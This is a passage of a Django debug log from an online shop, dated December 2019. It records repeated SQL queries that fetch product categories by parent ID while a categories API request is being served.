"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:36:06,892 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:36:06,896 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:36:06,900 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:36:06,906 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:36:06,911 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:36:06,915 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:36:06,919 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:36:06,923 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:36:06,929 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:36:06,933 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:36:06,937 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:36:06,940 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:36:06,944 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:36:06,950 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:36:06,952 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 07:36:06,954 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:36:06,957 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:36:06,959 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:36:06,961 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:36:06,964 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:36:06,966 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 07:36:06,969 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:36:06,971 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:36:06,973 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:36:06,976 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:36:06,979 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:36:06,981 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:36:06,983 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:36:06,985 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:36:06,989 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:36:06,991 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:36:06,993 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:36:06,996 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:36:06,998 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:36:07,000 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:36:07,004 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:36:07,007 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:36:07,010 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:36:07,013 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 07:36:07,016 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:36:07] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 07:37:17,784 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:37:17,794 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:37:17,800 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:37:17,803 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 07:37:17,809 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:37:17,812 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:37:17,815 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:37:17,818 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:37:17,822 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:37:17,829 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:37:17,833 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:37:17,837 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:37:17,842 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:37:17,846 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:37:17,852 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:37:17,857 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:37:17,861 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:37:17,865 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:37:17,869 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:37:17,876 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:37:17,880 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 07:37:17,884 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:37:17,888 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:37:17,892 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:37:17,896 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:37:17,902 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:37:17,907 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 